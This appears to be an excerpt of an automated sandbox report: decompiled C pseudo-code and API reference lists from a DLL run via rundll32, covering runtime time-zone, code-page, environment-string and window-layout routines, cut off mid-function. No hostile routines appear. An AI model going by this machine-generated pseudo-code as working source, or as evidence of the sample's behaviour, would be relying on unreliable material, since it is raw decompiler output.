                                                                        			E10018E14(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                        				int _t21;
                                                                        				long _t22;
                                                                        				char* _t24;
                                                                        				signed int _t26;
                                                                        				signed int _t27;
                                                                        				int _t29;
                                                                        				char* _t30;
                                                                        				int _t32;
                                                                        				char* _t33;
                                                                        				char* _t34;
                                                                        				char* _t35;
                                                                        				int _t36;
                                                                        				int _t39;
                                                                        				int _t41;
                                                                        				int _t44;
                                                                        				char* _t48;
                                                                        				signed int _t49;
                                                                        				void* _t51;
                                                                        				int _t52;
                                                                        				signed int _t54;
                                                                        				void* _t56;
                                                                        				void* _t58;
                                                                        				int _t60;
                                                                        				int _t63;
                                                                        				void* _t75;
                                                                        				void* _t76;
                                                                        				void* _t77;
                                                                        				signed int _t82;
                                                                        				char* _t87;
                                                                        				int _t89;
                                                                        				void* _t90;
                                                                        
                                                                        				_push(0x18);
                                                                        				_push(0x10042cd0);
                                                                        				E10012514(__ebx, __edi, __esi);
                                                                        				 *(_t90 - 0x20) = 0;
                                                                        				E10013A38(__ebx, 0, 7);
                                                                        				 *(_t90 - 4) = 0;
                                                                        				_t63 =  *0x1004f734; // 0x0
                                                                        				 *(_t90 - 0x28) = _t63;
                                                                        				 *0x1004f814 = 0;
                                                                        				 *0x1004ce8c =  *0x1004ce8c | 0xffffffff;
                                                                        				 *0x1004ce80 =  *0x1004ce80 | 0xffffffff;
                                                                        				_t87 = E1001ADE6("TZ");
                                                                        				 *((intOrPtr*)(_t90 - 0x24)) = _t87;
                                                                        				if(_t87 == 0 ||  *_t87 == 0) {
                                                                        					_t21 =  *0x1004f818; // 0x0
                                                                        					__eflags = _t21;
                                                                        					if(__eflags != 0) {
                                                                        						_push(_t21);
                                                                        						E100107C8(_t63, 0, _t87, __eflags);
                                                                        						 *0x1004f818 = 0;
                                                                        					}
                                                                        					_t22 = GetTimeZoneInformation(0x1004f768);
                                                                        					__eflags = _t22 - 0xffffffff;
                                                                        					if(_t22 == 0xffffffff) {
                                                                        						goto L31;
                                                                        					} else {
                                                                        						 *0x1004f814 = 1;
                                                                        						_t26 = 0x1004f768->Bias; // 0x0
                                                                        						_t27 = _t26 * 0x3c;
                                                                        						 *0x1004cde8 = _t27;
                                                                        						__eflags =  *0x1004f7ae; // 0x0
                                                                        						if(__eflags != 0) {
                                                                        							_t82 =  *0x1004f7bc; // 0x0
                                                                        							_t39 = _t27 + _t82 * 0x3c;
                                                                        							__eflags = _t39;
                                                                        							 *0x1004cde8 = _t39;
                                                                        						}
                                                                        						__eflags =  *0x1004f802; // 0x0
                                                                        						if(__eflags == 0) {
                                                                        							L22:
                                                                        							 *0x1004cdec = 0;
                                                                        							 *0x1004cdf0 = 0;
                                                                        							goto L23;
                                                                        						} else {
                                                                        							_t36 =  *0x1004f810; // 0x0
                                                                        							__eflags = _t36;
                                                                        							if(_t36 == 0) {
                                                                        								goto L22;
                                                                        							}
                                                                        							 *0x1004cdec = 1;
                                                                        							 *0x1004cdf0 = (_t36 -  *0x1004f7bc) * 0x3c;
                                                                        							L23:
                                                                        							_t29 = WideCharToMultiByte(_t63, 0, 0x1004f76c, 0xffffffff,  *0x1004ce78, 0x3f, 0, _t90 - 0x1c);
                                                                        							__eflags = _t29;
                                                                        							if(_t29 == 0) {
                                                                        								L26:
                                                                        								_t30 =  *0x1004ce78; // 0x1004cdf8
                                                                        								 *_t30 = 0;
                                                                        								L27:
                                                                        								_t32 = WideCharToMultiByte(_t63, 0, 0x1004f7c0, 0xffffffff,  *0x1004ce7c, 0x3f, 0, _t90 - 0x1c);
                                                                        								__eflags = _t32;
                                                                        								if(_t32 == 0) {
                                                                        									L30:
                                                                        									_t33 =  *0x1004ce7c; // 0x1004ce38
                                                                        									 *_t33 = 0;
                                                                        									goto L31;
                                                                        								}
                                                                        								__eflags =  *(_t90 - 0x1c);
                                                                        								if( *(_t90 - 0x1c) != 0) {
                                                                        									goto L30;
                                                                        								}
                                                                        								_t34 =  *0x1004ce7c; // 0x1004ce38
                                                                        								_t34[0x3f] = 0;
                                                                        								goto L31;
                                                                        							}
                                                                        							__eflags =  *(_t90 - 0x1c);
                                                                        							if( *(_t90 - 0x1c) != 0) {
                                                                        								goto L26;
                                                                        							}
                                                                        							_t35 =  *0x1004ce78; // 0x1004cdf8
                                                                        							_t35[0x3f] = 0;
                                                                        							goto L27;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					_t41 =  *0x1004f818; // 0x0
                                                                        					if(_t41 == 0) {
                                                                        						L6:
                                                                        						_t44 = E100107B6(E10011820(_t87) + 1);
                                                                        						 *0x1004f818 = _t44;
                                                                        						if(_t44 == 0) {
                                                                        							L31:
                                                                        							_t24 = E1001095E(_t90 - 0x10, 0xffffffff);
                                                                        							L47:
                                                                        							return E1001254F(_t24);
                                                                        						}
                                                                        						E10017B90(_t44, _t87);
                                                                        						_pop(_t75);
                                                                        						 *(_t90 - 4) =  *(_t90 - 4) | 0xffffffff;
                                                                        						E1001902F();
                                                                        						E10019E20( *0x1004ce78, _t87, 3);
                                                                        						_t48 =  *0x1004ce78; // 0x1004cdf8
                                                                        						_t48[3] = 0;
                                                                        						_t89 = _t87 + 3;
                                                                        						if( *_t89 == 0x2d) {
                                                                        							 *(_t90 - 0x20) = 1;
                                                                        							_t89 = _t89 + 1;
                                                                        						}
                                                                        						_t49 = E10012749(_t63, _t75, _t90, _t89);
                                                                        						_pop(_t76);
                                                                        						 *0x1004cde8 = _t49 * 0xe10;
                                                                        						while(1) {
                                                                        							_t51 =  *_t89;
                                                                        							if(_t51 != 0x2b && (_t51 < 0x30 || _t51 > 0x39)) {
                                                                        								break;
                                                                        							}
                                                                        							_t89 = _t89 + 1;
                                                                        						}
                                                                        						__eflags =  *_t89 - 0x3a;
                                                                        						if( *_t89 != 0x3a) {
                                                                        							L42:
                                                                        							__eflags =  *(_t90 - 0x20);
                                                                        							if( *(_t90 - 0x20) != 0) {
                                                                        								 *0x1004cde8 =  ~( *0x1004cde8);
                                                                        							}
                                                                        							_t52 =  *_t89;
                                                                        							 *0x1004cdec = _t52;
                                                                        							__eflags = _t52;
                                                                        							if(_t52 == 0) {
                                                                        								_t24 =  *0x1004ce7c; // 0x1004ce38
                                                                        								 *_t24 = 0;
                                                                        							} else {
                                                                        								E10019E20( *0x1004ce7c, _t89, 3);
                                                                        								_t24 =  *0x1004ce7c; // 0x1004ce38
                                                                        								_t24[3] = 0;
                                                                        							}
                                                                        							goto L47;
                                                                        						}
                                                                        						_t89 = _t89 + 1;
                                                                        						_t54 = E10012749(0x30, _t76, _t90, _t89);
                                                                        						_pop(_t77);
                                                                        						 *0x1004cde8 =  *0x1004cde8 + _t54 * 0x3c;
                                                                        						while(1) {
                                                                        							_t56 =  *_t89;
                                                                        							__eflags = _t56 - 0x30;
                                                                        							if(_t56 < 0x30) {
                                                                        								break;
                                                                        							}
                                                                        							__eflags = _t56 - 0x39;
                                                                        							if(_t56 > 0x39) {
                                                                        								break;
                                                                        							}
                                                                        							_t89 = _t89 + 1;
                                                                        							__eflags = _t89;
                                                                        						}
                                                                        						__eflags =  *_t89 - 0x3a;
                                                                        						if( *_t89 != 0x3a) {
                                                                        							goto L42;
                                                                        						}
                                                                        						_t89 = _t89 + 1;
                                                                        						 *0x1004cde8 =  *0x1004cde8 + E10012749(0x30, _t77, _t90, _t89);
                                                                        						while(1) {
                                                                        							_t58 =  *_t89;
                                                                        							__eflags = _t58 - 0x30;
                                                                        							if(_t58 < 0x30) {
                                                                        								goto L42;
                                                                        							}
                                                                        							__eflags = _t58 - 0x39;
                                                                        							if(_t58 > 0x39) {
                                                                        								goto L42;
                                                                        							}
                                                                        							_t89 = _t89 + 1;
                                                                        							__eflags = _t89;
                                                                        						}
                                                                        						goto L42;
                                                                        					}
                                                                        					if(E10016D00(_t87, _t41) == 0) {
                                                                        						goto L31;
                                                                        					} else {
                                                                        						_t60 =  *0x1004f818; // 0x0
                                                                        						_t99 = _t60;
                                                                        						if(_t60 != 0) {
                                                                        							_push(_t60);
                                                                        							E100107C8(_t63, 0, _t87, _t99);
                                                                        						}
                                                                        						goto L6;
                                                                        					}
                                                                        				}
                                                                        			}


































                                                                        0x10018f04
                                                                        0x10018f04
                                                                        0x10018f08
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10018f1a
                                                                        0x10018f1a
                                                                        0x10019038
                                                                        0x1001903b
                                                                        0x1001907b
                                                                        0x1001907b
                                                                        0x1001907e
                                                                        0x10019080
                                                                        0x10019080
                                                                        0x10019086
                                                                        0x10019089
                                                                        0x1001908e
                                                                        0x10019090
                                                                        0x100190ae
                                                                        0x100190b3
                                                                        0x10019092
                                                                        0x1001909b
                                                                        0x100190a3
                                                                        0x100190a8
                                                                        0x100190a8
                                                                        0x00000000
                                                                        0x10019090
                                                                        0x1001903d
                                                                        0x1001903f
                                                                        0x10019044
                                                                        0x10019048
                                                                        0x10019055
                                                                        0x10019055
                                                                        0x10019057
                                                                        0x10019059
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10019050
                                                                        0x10019052
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10019054
                                                                        0x10019054
                                                                        0x10019054
                                                                        0x1001905b
                                                                        0x1001905e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10019060
                                                                        0x10019068
                                                                        0x10019075
                                                                        0x10019075
                                                                        0x10019077
                                                                        0x10019079
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10019070
                                                                        0x10019072
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10019074
                                                                        0x10019074
                                                                        0x10019074
                                                                        0x00000000
                                                                        0x10019075
                                                                        0x10018e82
                                                                        0x00000000
                                                                        0x10018e88
                                                                        0x10018e88
                                                                        0x10018e8d
                                                                        0x10018e8f
                                                                        0x10018e91
                                                                        0x10018e92
                                                                        0x10018e97
                                                                        0x00000000
                                                                        0x10018e8f
                                                                        0x10018e82

                                                                        APIs
                                                                        • __lock.LIBCMT ref: 10018E27
                                                                          • Part of subcall function 10013A38: EnterCriticalSection.KERNEL32(?,?,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?), ref: 10013A60
                                                                        • _strlen.LIBCMT ref: 10018E99
                                                                        • _strcat.LIBCMT ref: 10018EB6
                                                                        • _strncpy.LIBCMT ref: 10018ECF
                                                                          • Part of subcall function 100107C8: __lock.LIBCMT ref: 100107E6
                                                                          • Part of subcall function 100107C8: RtlFreeHeap.NTDLL(00000000,?,10041D10,0000000C,10013A1C,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010), ref: 1001082D
                                                                        • GetTimeZoneInformation.KERNEL32(1004F768,10042CD0,00000018,10019429,10042CE0,00000008,10013474,?,?,0000003C,00000000,?,?,0000003C,00000000,?), ref: 10018F38
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,1004F76C,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,00000001), ref: 10018FC6
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,1004F7C0,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,00000001), ref: 10018FFA
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide__lock$CriticalEnterFreeHeapInformationSectionTimeZone_strcat_strlen_strncpy
                                                                        • String ID:
                                                                        • API String ID: 3757401926-0
                                                                        • Opcode ID: a9bae9aefb51bf9dcb25716141066ca3c4119656b85ae577e9b21111d529fdd4
                                                                        • Instruction ID: 7381ce5ac415a33791fc082bffc14b542c5be3190c63e6ff879a0c337f862410
                                                                        • Opcode Fuzzy Hash: a9bae9aefb51bf9dcb25716141066ca3c4119656b85ae577e9b21111d529fdd4
                                                                        • Instruction Fuzzy Hash: F871F6308046659EF751CB299E85E593FE9EB4B360F20422EE490DF2E1D770DAC2CB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E1001A487(void* __ebx, void* __edi, int __esi, void* __eflags) {
                                                                        				intOrPtr _t54;
                                                                        				int _t56;
                                                                        				char* _t57;
                                                                        				int _t68;
                                                                        				char* _t69;
                                                                        				int _t70;
                                                                        				int _t73;
                                                                        				void* _t77;
                                                                        				int _t81;
                                                                        				short* _t82;
                                                                        				void* _t97;
                                                                        				short* _t98;
                                                                        
                                                                        				_t94 = __esi;
                                                                        				_push(0x38);
                                                                        				_push(0x10042f10);
                                                                        				E10012514(__ebx, __edi, __esi);
                                                                        				_t54 =  *0x1004c470; // 0x1bfbe703
                                                                        				 *((intOrPtr*)(_t97 - 0x1c)) = _t54;
                                                                        				 *(_t97 - 0x34) = 0;
                                                                        				 *(_t97 - 0x44) = 0;
                                                                        				_t81 =  *( *(_t97 + 0x14));
                                                                        				 *(_t97 - 0x40) = _t81;
                                                                        				 *(_t97 - 0x3c) = 0;
                                                                        				_t56 =  *(_t97 + 8);
                                                                        				if(_t56 ==  *(_t97 + 0xc)) {
                                                                        					_t82 =  *(_t97 - 0x48);
                                                                        					goto L31;
                                                                        				} else {
                                                                        					_t85 = _t97 - 0x30;
                                                                        					if(GetCPInfo(_t56, _t97 - 0x30) != 0 &&  *(_t97 - 0x30) == 1 && GetCPInfo( *(_t97 + 0xc), _t97 - 0x30) != 0 &&  *(_t97 - 0x30) == 1) {
                                                                        						 *(_t97 - 0x3c) = 1;
                                                                        					}
                                                                        					if( *(_t97 - 0x3c) == 0) {
                                                                        						_t94 =  *(_t97 - 0x38);
                                                                        					} else {
                                                                        						if(_t81 == 0xffffffff) {
                                                                        							_t77 = E10011820( *(_t97 + 0x10));
                                                                        							_pop(_t85);
                                                                        							_t94 = _t77 + 1;
                                                                        							__eflags = _t94;
                                                                        						} else {
                                                                        							_t94 = _t81;
                                                                        						}
                                                                        						 *(_t97 - 0x38) = _t94;
                                                                        					}
                                                                        					if( *(_t97 - 0x3c) != 0) {
                                                                        						L14:
                                                                        						 *(_t97 - 4) = 0;
                                                                        						E10010B20(_t94 + _t94 + 0x00000003 & 0xfffffffc, _t85);
                                                                        						 *(_t97 - 0x18) = _t98;
                                                                        						_t82 = _t98;
                                                                        						 *(_t97 - 0x48) = _t82;
                                                                        						E10011C50(_t82, 0, _t94 + _t94);
                                                                        						 *(_t97 - 4) =  *(_t97 - 4) | 0xffffffff;
                                                                        						_t111 = _t82;
                                                                        						if(_t82 != 0) {
                                                                        							L19:
                                                                        							_t68 = MultiByteToWideChar( *(_t97 + 8), 1,  *(_t97 + 0x10),  *(_t97 - 0x40), _t82, _t94);
                                                                        							__eflags = _t68;
                                                                        							if(_t68 == 0) {
                                                                        								L31:
                                                                        								__eflags =  *(_t97 - 0x44);
                                                                        								if(__eflags != 0) {
                                                                        									_push(_t82);
                                                                        									E100107C8(_t82, 0, _t94, __eflags);
                                                                        								}
                                                                        								_t57 =  *(_t97 - 0x34);
                                                                        								goto L34;
                                                                        							}
                                                                        							__eflags =  *(_t97 + 0x18);
                                                                        							if( *(_t97 + 0x18) == 0) {
                                                                        								__eflags =  *(_t97 - 0x3c);
                                                                        								if(__eflags != 0) {
                                                                        									L25:
                                                                        									_push(_t94);
                                                                        									_push(1);
                                                                        									_t69 = E1001382A(_t82, 0, _t94, __eflags);
                                                                        									 *(_t97 - 0x34) = _t69;
                                                                        									__eflags = _t69;
                                                                        									if(_t69 != 0) {
                                                                        										_t70 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94, _t69, _t94, 0, 0);
                                                                        										__eflags = _t70;
                                                                        										if(__eflags != 0) {
                                                                        											__eflags =  *(_t97 - 0x40) - 0xffffffff;
                                                                        											if( *(_t97 - 0x40) != 0xffffffff) {
                                                                        												 *( *(_t97 + 0x14)) = _t70;
                                                                        											}
                                                                        										} else {
                                                                        											_push( *(_t97 - 0x34));
                                                                        											E100107C8(_t82, 0, _t94, __eflags);
                                                                        											 *(_t97 - 0x34) = 0;
                                                                        										}
                                                                        									}
                                                                        									goto L31;
                                                                        								}
                                                                        								_t94 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94, 0, 0, 0, 0);
                                                                        								__eflags = _t94;
                                                                        								if(__eflags == 0) {
                                                                        									goto L31;
                                                                        								}
                                                                        								goto L25;
                                                                        							}
                                                                        							_t73 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94,  *(_t97 + 0x18),  *(_t97 + 0x1c), 0, 0);
                                                                        							__eflags = _t73;
                                                                        							if(_t73 != 0) {
                                                                        								 *(_t97 - 0x34) =  *(_t97 + 0x18);
                                                                        							}
                                                                        							goto L31;
                                                                        						} else {
                                                                        							_push(_t94);
                                                                        							_push(2);
                                                                        							_t82 = E1001382A(_t82, 0, _t94, _t111);
                                                                        							if(_t82 != 0) {
                                                                        								 *(_t97 - 0x44) = 1;
                                                                        								goto L19;
                                                                        							}
                                                                        							goto L17;
                                                                        						}
                                                                        					} else {
                                                                        						_t94 = MultiByteToWideChar( *(_t97 + 8), 1,  *(_t97 + 0x10), _t81, 0, 0);
                                                                        						 *(_t97 - 0x38) = _t94;
                                                                        						if(_t94 == 0) {
                                                                        							L17:
                                                                        							_t57 = 0;
                                                                        							L34:
                                                                        							return E1001254F(E100117AE(_t57,  *((intOrPtr*)(_t97 - 0x1c))));
                                                                        						}
                                                                        						goto L14;
                                                                        					}
                                                                        				}
                                                                        			}















                                                                        0x1001a5cd
                                                                        0x00000000
                                                                        0x1001a574
                                                                        0x1001a574
                                                                        0x1001a575
                                                                        0x1001a57e
                                                                        0x1001a582
                                                                        0x1001a58b
                                                                        0x00000000
                                                                        0x1001a58b
                                                                        0x00000000
                                                                        0x1001a582
                                                                        0x1001a512
                                                                        0x1001a523
                                                                        0x1001a525
                                                                        0x1001a52a
                                                                        0x1001a584
                                                                        0x1001a584
                                                                        0x1001a63f
                                                                        0x1001a64f
                                                                        0x1001a64f
                                                                        0x00000000
                                                                        0x1001a52a
                                                                        0x1001a510

                                                                        APIs
                                                                        • GetCPInfo.KERNEL32(00000000,?,10042F10,00000038,100185C0,?,00000000,00000000,10012C1E,00000000,00000000,10042730,0000001C,1001294D,00000001,00000020), ref: 1001A4C5
                                                                        • GetCPInfo.KERNEL32(00000000,00000001), ref: 1001A4D8
                                                                        • _strlen.LIBCMT ref: 1001A4FC
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,10012C1E,?,00000000,00000000), ref: 1001A51D
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Info$ByteCharMultiWide_strlen
                                                                        • String ID:
                                                                        • API String ID: 1335377746-0
                                                                        • Opcode ID: a1739f8af5073df943149c03816b326863122fdfa87c5946c56ad2dc74c300ca
                                                                        • Instruction ID: 70101fa7554b3a37292e61141452f95f373fba0d19c42cfe0f4ebf6b77a3f96e
                                                                        • Opcode Fuzzy Hash: a1739f8af5073df943149c03816b326863122fdfa87c5946c56ad2dc74c300ca
                                                                        • Instruction Fuzzy Hash: 99514671900619ABDF21CFA5DC84D9EBBF9FF867A0B24411AF814AA190D7309DC1CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 98%
                                                                        			E1001666B() {
                                                                        				int _v4;
                                                                        				int _v8;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t7;
                                                                        				CHAR* _t8;
                                                                        				WCHAR* _t16;
                                                                        				int _t19;
                                                                        				char* _t23;
                                                                        				int _t24;
                                                                        				long _t28;
                                                                        				int _t29;
                                                                        				void* _t34;
                                                                        				WCHAR* _t36;
                                                                        				CHAR* _t37;
                                                                        				intOrPtr _t38;
                                                                        				int _t40;
                                                                        
                                                                        				_t7 =  *0x1004f700; // 0x1
                                                                        				_t29 = 0;
                                                                        				_t36 = 0;
                                                                        				_t38 = 2;
                                                                        				if(_t7 != 0) {
                                                                        					L6:
                                                                        					__eflags = _t7 - 1;
                                                                        					if(__eflags != 0) {
                                                                        						__eflags = _t7 - _t38;
                                                                        						if(_t7 == _t38) {
                                                                        							L21:
                                                                        							_t8 = GetEnvironmentStrings();
                                                                        							_t37 = _t8;
                                                                        							__eflags = _t37 - _t29;
                                                                        							if(_t37 == _t29) {
                                                                        								L20:
                                                                        								return 0;
                                                                        							}
                                                                        							__eflags =  *_t37 - _t29;
                                                                        							if( *_t37 == _t29) {
                                                                        								L25:
                                                                        								_t39 = _t8 - _t37 + 1;
                                                                        								_t34 = E100107B6(_t8 - _t37 + 1);
                                                                        								__eflags = _t34 - _t29;
                                                                        								if(_t34 != _t29) {
                                                                        									E10011440(_t34, _t37, _t39);
                                                                        								} else {
                                                                        									_t34 = 0;
                                                                        								}
                                                                        								FreeEnvironmentStringsA(_t37);
                                                                        								return _t34;
                                                                        							} else {
                                                                        								goto L23;
                                                                        							}
                                                                        							do {
                                                                        								do {
                                                                        									L23:
                                                                        									_t8 =  &(_t8[1]);
                                                                        									__eflags =  *_t8 - _t29;
                                                                        								} while ( *_t8 != _t29);
                                                                        								_t8 =  &(_t8[1]);
                                                                        								__eflags =  *_t8 - _t29;
                                                                        							} while ( *_t8 != _t29);
                                                                        							goto L25;
                                                                        						}
                                                                        						__eflags = _t7 - _t29;
                                                                        						if(_t7 == _t29) {
                                                                        							goto L21;
                                                                        						}
                                                                        						goto L20;
                                                                        					}
                                                                        					L7:
                                                                        					if(_t36 != _t29) {
                                                                        						L9:
                                                                        						_t16 = _t36;
                                                                        						if( *_t36 == _t29) {
                                                                        							L12:
                                                                        							_t19 = (_t16 - _t36 >> 1) + 1;
                                                                        							_v4 = _t19;
                                                                        							_t40 = WideCharToMultiByte(_t29, _t29, _t36, _t19, _t29, _t29, _t29, _t29);
                                                                        							if(_t40 != _t29) {
                                                                        								_t23 = E100107B6(_t40);
                                                                        								_v8 = _t23;
                                                                        								if(_t23 != _t29) {
                                                                        									_t24 = WideCharToMultiByte(_t29, _t29, _t36, _v4, _t23, _t40, _t29, _t29);
                                                                        									_t52 = _t24;
                                                                        									if(_t24 == 0) {
                                                                        										_push(_v8);
                                                                        										E100107C8(_t29, WideCharToMultiByte, _t36, _t52);
                                                                        										_v8 = _t29;
                                                                        									}
                                                                        									_t29 = _v8;
                                                                        								}
                                                                        							}
                                                                        							FreeEnvironmentStringsW(_t36);
                                                                        							return _t29;
                                                                        						} else {
                                                                        							goto L10;
                                                                        						}
                                                                        						do {
                                                                        							do {
                                                                        								L10:
                                                                        								_t16 = _t16 + _t38;
                                                                        							} while ( *_t16 != _t29);
                                                                        							_t16 = _t16 + _t38;
                                                                        						} while ( *_t16 != _t29);
                                                                        						goto L12;
                                                                        					}
                                                                        					_t36 = GetEnvironmentStringsW();
                                                                        					if(_t36 == _t29) {
                                                                        						goto L20;
                                                                        					}
                                                                        					goto L9;
                                                                        				}
                                                                        				_t36 = GetEnvironmentStringsW();
                                                                        				if(_t36 == 0) {
                                                                        					_t28 = GetLastError();
                                                                        					__eflags = _t28 - 0x78;
                                                                        					if(_t28 != 0x78) {
                                                                        						_t7 =  *0x1004f700; // 0x1
                                                                        					} else {
                                                                        						_t7 = _t38;
                                                                        						 *0x1004f700 = _t7;
                                                                        					}
                                                                        					goto L6;
                                                                        				} else {
                                                                        					 *0x1004f700 = 1;
                                                                        					goto L7;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10016687
                                                                        • GetLastError.KERNEL32(?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001669B
                                                                        • GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100166BD
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,10011248), ref: 100166F1
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,10011248,?,?), ref: 10016713
                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001672C
                                                                        • GetEnvironmentStrings.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10016742
                                                                        • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 1001677E
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: EnvironmentStrings$ByteCharFreeMultiWide$ErrorLast
                                                                        • String ID:
                                                                        • API String ID: 883850110-0
                                                                        • Opcode ID: bfeabb1aff3bc99bbfe24a1f77970b714d91aefed0498c732c899eb5009dd72e
                                                                        • Instruction ID: 9752ab07c098c977bc575d501e7eaa0deb9efe59c3b15e47417eb48d6ecdcefd
                                                                        • Opcode Fuzzy Hash: bfeabb1aff3bc99bbfe24a1f77970b714d91aefed0498c732c899eb5009dd72e
                                                                        • Instruction Fuzzy Hash: 7831A5B260D26A6FE311EF654CC882BBADCEB4E1D8712092DF681CB191D671DCC496A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 87%
                                                                        			E10022499(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, signed char _a17, struct tagRECT* _a20, signed int _a24, intOrPtr _a28) {
                                                                        				int _v8;
                                                                        				intOrPtr _v12;
                                                                        				int _v16;
                                                                        				int _v20;
                                                                        				struct tagRECT _v36;
                                                                        				void* _v40;
                                                                        				void* __ebp;
                                                                        				signed int _t61;
                                                                        				int _t62;
                                                                        				signed short _t63;
                                                                        				void* _t64;
                                                                        				void* _t72;
                                                                        				intOrPtr* _t85;
                                                                        				signed int _t87;
                                                                        				struct HWND__* _t91;
                                                                        				void* _t92;
                                                                        
                                                                        				_t72 = __ecx;
                                                                        				_v8 = 0;
                                                                        				_v12 = _a28;
                                                                        				_v16 = 0;
                                                                        				_v20 = 0;
                                                                        				if(_a24 == 0) {
                                                                        					GetClientRect( *(__ecx + 0x1c),  &_v36);
                                                                        				} else {
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        				}
                                                                        				_t61 = _a16 & 0xffff7fff;
                                                                        				_a24 = _t61;
                                                                        				if(_t61 == 1) {
                                                                        					_v40 = _v40 & 0x00000000;
                                                                        				} else {
                                                                        					_v40 = BeginDeferWindowPos(8);
                                                                        				}
                                                                        				_t62 = GetTopWindow( *(_t72 + 0x1c));
                                                                        				while(1) {
                                                                        					_t91 = _t62;
                                                                        					if(_t91 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					_t63 = GetDlgCtrlID(_t91);
                                                                        					_push(_t91);
                                                                        					_t87 = _t63 & 0x0000ffff;
                                                                        					_t64 = E10022115();
                                                                        					if(_t87 != _a12) {
                                                                        						if(_t87 >= _a4 && _t87 <= _a8 && _t64 != 0) {
                                                                        							SendMessageA(_t91, 0x361, 0,  &_v40);
                                                                        						}
                                                                        					} else {
                                                                        						_v8 = _t91;
                                                                        					}
                                                                        					_t62 = GetWindow(_t91, 2);
                                                                        				}
                                                                        				if(_a24 != 1) {
                                                                        					if(_a12 != 0 && _v8 != 0) {
                                                                        						_t62 = E100220EE(_t92, _v8);
                                                                        						if(_a24 == 2) {
